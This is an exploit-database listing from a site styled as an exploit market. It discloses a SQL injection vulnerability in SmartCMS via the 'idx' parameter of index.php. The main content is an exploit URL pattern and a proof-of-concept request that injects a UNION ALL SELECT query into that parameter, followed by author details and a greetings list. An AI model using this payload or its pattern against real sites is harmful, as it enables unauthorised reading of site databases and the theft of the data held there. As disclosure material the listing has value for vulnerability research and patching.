[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SmartCMS (index.php, idx parameter) SQL Injection Vulnerability

Author
NoGe
Risk
[
Security Risk High
]
0day-ID
0day-ID-19800
Category
web applications
Date add
26-11-2012
Platform
php
=============================================================================================================
   
  [o] SmartCMS <= SQL Injection Vulnerability
    
       Software : SmartMS
       Vendor   : http://smartcms.nl/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
  
=============================================================================================================
  
  [o] Exploit
  
       http://localhost/[path]/index.php?idx=[SQLi]
  
  
  [o] PoC
  
       http://localhost/[path]/index.php?idx=123+AND+1=2+UNION+ALL+SELECT+version()--
  
=============================================================================================================
  
  [o] Greetz
  
       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{
  
=============================================================================================================
  
  [o] November 26 2012 - Papua, Indonesia

#  0day.today [2024-11-14]  #